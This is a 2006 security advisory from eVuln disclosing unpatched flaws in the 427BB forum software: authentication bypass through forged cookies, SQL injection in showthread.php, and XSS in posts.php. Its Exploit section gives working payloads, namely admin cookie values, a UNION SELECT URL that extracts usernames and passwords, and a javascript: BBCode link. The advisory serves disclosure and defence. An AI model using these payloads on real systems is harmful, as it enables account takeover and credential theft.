[eVuln] 427BB Multiple Vulnerabilities (Cookie-based Authentication Bypass, SQL Injections, XSS)

[alex@xxxxxxxxx]

New eVuln Advisory:
427BB Multiple Vulnerabilities (Cookie-based Authentication Bypass, SQL 
Injections, XSS)

--------------------Summary----------------

Software: 427BB
Sowtware's Web Site: http://sourceforge.net/projects/fourtwosevenbb
Versions: checked: 2.2 and 2.2.1
Critical Level: Dangerous
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
Published: 2006.01.07
eVuln ID: EV0018

-----------------Description--------------
427BB has multiple vulnerabilities.


1. Authentication bypass using modified cookie values.

Vulnerabe scripts: login.php getvars.php
To authorize any logged-in user forum scripts checks only three cookie values:
username
authenticated
usertype
Forum dont make password comparison.


2. 427BB has Multiple SQL Injection Vulnerabilities.

For example:
Vulnerabe script: showthread.php
Variable $ForumID isn't properly sanitized before being used in a SQL query. 
This can be used to make any SQL query by injecting arbitrary SQL code


3. Arbitrary script code insertion is possible when posting a message 
containing URL.
Vulnerable Script: posts.php
Condition: visitor needs to click this link

--------------Exploit---------------------
1. Authentication bypass using modified cookie values.

Cookie: username=admin;
Cookie: authenticated=1;
Cookie: usertype=admin;

2. SQL Injection Example.

Need to be logged in as registered user.
http://host/bb427/showthread.php?ForumID=999%20union%20select%20UserName,Passwrod,null,null%20from%20prefPersonal

3. Arbitrary script code insertion.

Posting new message.
Message text:
[url=javascript:alert(123)]clickme[/url]

--------------Solution---------------------
No Patch available.

--------------Credit---------------------
Original Advisory:
http://evuln.com/vulns/18/summary.html

Discovered by: Aliaksandr Hartsuyeu (eVuln.com)